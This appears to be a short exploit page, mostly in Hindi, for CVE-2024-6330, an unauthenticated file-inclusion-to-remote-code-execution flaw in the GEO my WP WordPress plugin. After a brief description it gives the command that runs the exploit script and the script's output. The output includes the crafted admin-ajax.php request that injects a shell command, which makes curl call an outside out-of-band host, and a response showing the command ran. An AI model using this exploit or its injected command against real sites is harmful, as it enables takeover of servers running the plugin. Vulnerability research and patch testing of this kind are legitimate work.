
GEO मेरा WordPress < 4.5.0.2 - अप्रमाणित LFI से RCE/PHAR Deserialization
GEO my WordPress <= 4.5.0.1 - अप्रमाणित स्थानीय फ़ाइल समावेशन
WordPress के लिए GEO my WP प्लगइन, 4.5.0.1 तक के सभी संस्करणों में, 'form[info_window_template][content_path]' पैरामीटर के माध्यम से स्थानीय फ़ाइल समावेशन के लिए संवेदनशील है। इससे अप्रमाणित हमलावरों के लिए सर्वर पर मनमानी फ़ाइलों को शामिल करना और निष्पादित करना संभव हो जाता है, जिससे उन फ़ाइलों में किसी भी PHP कोड का निष्पादन हो सकता है। इसका उपयोग पहुंच नियंत्रणों को बायपास करने, संवेदनशील डेटा प्राप्त करने, या उन मामलों में कोड निष्पादन प्राप्त करने के लिए किया जा सकता है जहां छवियों और अन्य "सुरक्षित" फ़ाइल प्रकारों को अपलोड और शामिल किया जा सकता है।
python3 CVE-2024-6330.py --url https://wp-dev.ddev.site --proxy http://127.0.0.1:8080 --execute="curl http://2qtstva3iqdxwqryck6wh3wsqjwak08p.oast.site"
[*] Starting security test...
[*] Initial visit to https://wp-dev.ddev.site: 200
[+] Testing object_id: 1
[+] URL: https://wp-dev.ddev.site/wp-admin/admin-ajax.php?action=gmw_info_window_init&0=echo%20Command%20Output:%20$(curl http://2qtstva3iqdxwqryck6wh3wsqjwak08p.oast.site)
[+] Status Code: 200
[+] Response Content:
Command Output: <html><body>ivv900fnzbln0dem43z7zmzjjgigz</body></html>